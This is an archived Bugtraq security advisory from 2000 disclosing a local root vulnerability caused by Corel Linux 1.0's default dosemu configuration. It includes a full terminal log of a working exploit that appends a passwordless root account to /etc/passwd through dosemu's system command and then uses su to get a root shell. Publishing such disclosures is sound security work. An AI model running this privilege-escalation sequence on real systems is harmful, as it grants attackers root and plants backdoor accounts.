[14153] in bugtraq
Corel Linux 1.0 dosemu default configuration: Local root vuln
daemon@ATHENA.MIT.EDU (suid@SUID.KG)
Fri Mar 3 13:11:56 2000
Message-Id: <200003020436.PAA20168@jawa.chilli.net.au>
Date: Tue, 2 Mar 0100 04:47:11 +0000
Reply-To: suid@SUID.KG
From: suid@SUID.KG
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Re all,
Hadn't seen this one around yet, has been on my site for about a week now.
Corel's mailserver bounced me about this IIRC? Whats up Corel?
Cheers.
----------------------------
suid@suid.kg - Corel Linux dosemu config error. Local root compromise.
Software: Corel Linux 1.0 dosemu distribution configuration
URL: http://linux.corel.com
Version: Version 1.0
Platforms: Corel Linux only.
Type: Default misconfiguration. Noone reads README anymore??
Summary:
Local users can take advantage of a packaging and configuration
error (which has been known and documented for a long time) to
execute arbitrary commands as root.
We see from the doc/README/SECURITY file as well as
http://www.dosemu.org/docs/README/0.98/README-3.html
written in 1997 that this configuration is bad.
Vulnerability:
The system.com command is available to any user who runs the
dos emulator. This is a direct violation of the advice from
the SECURITY readme file:
Never allow the 'system.com' command (part of dosemu)
to be executed. It makes dosemu
execute the libc 'system() function'. Though privileges
are turned off, the process inherits the
switched uid-setting (uid=root, euid=user), hence the
unix process can use setreuid to gain root
access back. ... the rest you can imagine your self.
Exploit:
This is a script log which details how to reproduce this:
Script started on Fri Feb 25 13:54:00 2000
nebula:~$ id
uid=1000(suid) gid=1000(suid) groups=1000(suid)
nebula:~$ cat > hack-corel
#!/bin/bash
echo "owned::0:0::/:/bin/bash" >> /etc/passwd
^D
nebula:~$ chmod a+rx hack-corel
nebula:~$ export PATH="$PATH:."
nebula:~$ dos
CPU speed set to 430/1 MHz
Running on CPU=586, FPU=1, rdtsc=1
[ snip bunch of dosemu crap ]
"Welcome to dosemu 0.98!
C:\> system hack-corel;
sh: : command not found
C:\> exitERROR: general protection at 0x3f0ff: 0
ERROR: SIGSEGV, protected insn...exiting!
nebula:~$ tail -1 /etc/passwd
owned::0:0::/:/bin/bash
nebula:~$ su owned
nebula:/home/suid# id
uid=0(root) gid=0(root) groups=0(root)
nebula:/home/suid# exit
exit
nebula:~$ exit
Script done on Fri Feb 25 13:55:27 2000
Note:
This is not a vulnerability in dosemu itself. The documentation
warns users very specifically that this will happen if the system
is configured as such.
Greets:
duke
cr
active
